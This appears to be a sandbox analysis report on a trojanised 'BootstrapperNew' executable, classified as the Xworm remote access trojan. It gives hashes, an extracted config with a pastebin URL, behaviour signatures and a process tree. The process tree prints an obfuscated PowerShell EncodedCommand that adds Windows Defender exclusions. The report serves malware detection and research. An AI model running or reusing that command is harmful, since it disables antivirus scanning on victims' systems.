Overview

overview

10

Static

static

3

Y1138_Boot...ew.exe

windows7-x64

10

Y1138_Boot...ew.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    04/03/2025, 21:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Y1138_BootstrapperNew.exe

  • Size

    2.9MB

  • MD5

    ec8002f20ee00ec84138608ebb7d5154

  • SHA1

    d77b5dfa71bf3b48e351d69a6b251c21c8650d0d

  • SHA256

    9376c048648b422f2e84397e969f9d403a4fa6d30c2aabdaba2880e09761f28f

  • SHA512

    3ee7644cea6fef18cc17f8a0a46408bdb2897fa2da7808e5bc8563786f3a529b2c57141123e2d29eaba03061273ca28d3b3d3ae5758089ce2d4d6a992d661487

  • SSDEEP

    49152:gUcNWu+5IYryMRbEKRWomDRtL38nmVu4+0R/1nnBsfwGGQCEnNNemNznrYWfym//:gUD15XNRbVRWomDRtrbrNnnsbGQCEnNP

Score
10/10
xwormdefense_evasiondiscoveryrattrojan

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %port%

  • install_file

    svchost.exe

  • pastebin_url

    https://pastebin.com/raw/GMv8QPCE

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Y1138_BootstrapperNew.exe
    "C:\Users\Admin\AppData\Local\Temp\Y1138_BootstrapperNew.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2396
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYQBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAbQBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAawBhACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:280
    • C:\Windows\WMI Provider Host.exe
      "C:\Windows\WMI Provider Host.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1960
    • C:\Users\Admin\BootstrapperNew.exe
      "C:\Users\Admin\BootstrapperNew.exe"
      2⤵
      • Executes dropped EXE
      PID:2384

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\BootstrapperNew.exe
    Filesize

    2.9MB

    MD5

    f227cdfd423b3cc03bb69c49babf4da3

    SHA1

    3db5a97d9b0f2545e7ba97026af6c28512200441

    SHA256

    cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8

    SHA512

    b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e

    Download Submit

  • C:\Windows\WMI Provider Host.exe
    Filesize

    57KB

    MD5

    7f4631cc67828fc55d6c8bd1af02bf44

    SHA1

    54d6e1c3e0b655d231d461e32d187c0f2338295d

    SHA256

    5361c6e459fd49ee6a11f586c5dd3a2626f1338cdc4ce661287f48966451a6dd

    SHA512

    f931f8bde5aa6c2d528031fd5505eb6a0044edddcd1c5798ef762102e8d59e5701087259258d5cc15fea59e1e199f2c870fa95ad748a8e20680096cc4d62c348

    Download Submit

  • memory/1960-13-0x0000000000010000-0x0000000000024000-memory.dmp

    Filesize

    80KB

    Download

  • memory/2384-24-0x000000001AF10000-0x000000001AF1A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2384-16-0x00000000007D0000-0x00000000007DA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2384-15-0x00000000007D0000-0x00000000007DA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2384-17-0x00000000007D0000-0x00000000007E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2384-22-0x000000001AF20000-0x000000001AF28000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2384-14-0x0000000000820000-0x0000000000B02000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2384-23-0x000000001AF30000-0x000000001AF46000-memory.dmp

    Filesize

    88KB

    Download

  • memory/2384-21-0x000000001AEE0000-0x000000001AF06000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2384-26-0x000000001AF50000-0x000000001AF58000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2384-25-0x0000000002740000-0x000000000274A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2384-20-0x000000001AED0000-0x000000001AEDA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2384-19-0x000000001E2F0000-0x000000001E3F0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2384-28-0x00000000007D0000-0x00000000007DA000-memory.dmp

    Filesize

    40KB

    Download